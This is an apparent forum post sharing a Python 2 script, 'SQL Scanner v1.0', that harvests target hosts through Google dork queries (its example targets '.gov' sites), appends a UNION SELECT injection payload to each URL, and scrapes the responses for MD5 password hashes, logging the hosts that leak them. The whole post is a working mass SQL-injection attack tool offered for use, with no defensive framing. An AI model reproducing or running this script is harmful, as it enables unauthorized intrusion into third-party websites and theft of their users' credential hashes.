Edit: In Falsche Sektion gepostet! Gehört natürlich in "Python".

Code:
#!/usr/bin/python
#SQL Scanner that will collect hosts using a google query. Will add the
#injection code to each host and search for md5 in the source.

# +D3HYDR8+
#d3hydr8[at]gmail[dot]com

import sys, urllib2, re, sets, time, socket, httplib

def title():
   print "\n\t   d3hydr8[at]gmail[dot]com SQL Scanner v1.0"
   print "\t-----------------------------------------------"
   
def usage():
   title()
   print "\n  Usage: python SQLscan.py <options>\n"
   print "\n  Example: python SQLscan.py -g inurl:'.gov' 200 -s '/index.php?offset=-1/**/UNION/**/SELECT/**/1,2,concat(password)/**/FROM/**/TABLE/*' -write sql_found.txt -v\n"
   print "\t[options]"
   print "\t   -g/-google <query> <num of hosts> : Searches google for hosts"
   print "\t   -s/-sql <file+injection code> : Vuln. file plux sql injection"   
   print "\t   -w/-write <file> : Writes potential SQL found to file"
   print "\t   -v/-verbose : Verbose Mode\n"

def StripTags(text):
     finished = 0
     while not finished:
         finished = 1
         start = text.find("<")
         if start >= 0:
             stop = text[start:].find(">")
             if stop >= 0:
                 text = text[:start] + text[start+stop+1:]
                 finished = 0
     return text
   
def timer():
   now = time.localtime(time.time())
   return time.asctime(now)

def geturls(query):
   
   counter =  10
   urls = []
   while counter < int(num):
      url = 'http://www.google.com/search?hl=en&q='+query+'&hl=en&lr=&start='+repr(counter)+'&sa=N'
      opener = urllib2.build_opener(url)
      opener.addheaders = [('User-agent', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)')]
      data = opener.open(url).read()
      hosts = re.findall(('\w+\.[\w\.\-/]*\.\w+'),StripTags(data))
      #Lets add sites found to a list if not already or a google site.
      #We don't want to upset the people that got our list for us.
      for x in hosts:
         if x.find('www') != -1:
            x = x[x.find('www'):]
         if x not in urls and re.search("google", x) == None:
            urls.append(x)
      counter += 10
   return urls
         
def tester(victim):
   
   if victim[:7] != "http://":
      victim = "http://"+victim.rsplit("/",1)[0]+sql
   if verbose ==1:
      print "Testing:",victim
   try:
      source = urllib2.urlopen(victim.rsplit("/",1)[0]+sql, "80").read()
      md5s = re.findall("[a-f0-9]"*32,source)
      if len(md5s) >= 1:
         md5s = list(sets.Set(md5s))
         print "\n[!] MD5 Found:",''.join([str(i) for i in victim.split("/",3)[:3]])[5:]
         for md5 in md5s:
            print "\t[",md5,"]\n"
         found_sql.append(victim)
   except(socket.timeout, socket.gaierror, socket.error, IOError, ValueError, httplib.BadStatusLine):
      pass
   except(KeyboardInterrupt):
      print "\n[-] Cancelled -",timer(),"\n"
      sys.exit(1)
   except():
      pass
   
if len(sys.argv) < 6:
   usage()
   sys.exit(1)
 
for arg in sys.argv[1:]:
   if arg.lower() == "-v" or arg.lower() == "-verbose":
      verbose = 1
   if arg.lower() == "-w" or arg.lower() == "-write":
      txt = sys.argv[int(sys.argv[1:].index(arg))+2]
   if arg.lower() == "-s" or arg.lower() == "-sql":
      sql = sys.argv[int(sys.argv[1:].index(arg))+2]
   if arg.lower() == "-g" or arg.lower() == "-google":
      query = sys.argv[int(sys.argv[1:].index(arg))+2]
      num = sys.argv[int(sys.argv[1:].index(arg))+3]
title()
socket.setdefaulttimeout(10)
found_sql = []
count = 0
print "\n[+] SQL_scan Loaded"
try:
   if verbose ==1:
      print "[+] Verbose Mode On"
except(NameError):
   verbose = 0
   print "[-] Verbose Mode Off"
if sql[:1] != "/":
   sql = "/"+sql
print "[+] SQL:",sql
try:
   if txt:
      print "[+] File:",txt
except(NameError):
   txt = None
   pass
try:
   if num.isdigit() == False:
      print "\n[-] Argument [",num,"] must be a number.\n"
      sys.exit(1)
   else:
      if int(num) <= 10:
         print "\n[-] Argument [",num,"] must be greater than 10.\n"
         sys.exit(1)
except(IndexError):
   print "\n[-] Need number of hosts to collect.\n"
   sys.exit(1)
query = re.sub("\s","+",query)
print "[+] Query:",query
print "[+] Number:",num
print "[+] Querying Google..."
urls = geturls(query)
print "[+] Collected:",len(urls),"hosts"
print "[+] Started:",timer()
print "[+] Scanning hosts..."
print "\n[-] Cancel: Press Ctrl-C"
for url in urls:
   tester(url)
time.sleep(3)
print "-"*65
print "\n\n[+] Potential SQL found:",len(found_sql),"\n"
time.sleep(3)
if txt != None and len(found_sql) >=1:
   sql_file = open(txt, "a")
   sql_file.writelines("\n\td3hydr8[at]gmail[dot]com SQL Scanner v1.0\n")
   sql_file.writelines("\t------------------------------------------\n\n")
   print "[+] Writing Data:",txt
else:
   print "[-] No data written to disk"
for k in found_sql:
   count+=1
   if txt != None:
      sql_file.writelines("["+str(count)+"] "+k+"\n")
      print "\n["+str(count)+"]",k
print "\n[-] Done -",timer(),"\n"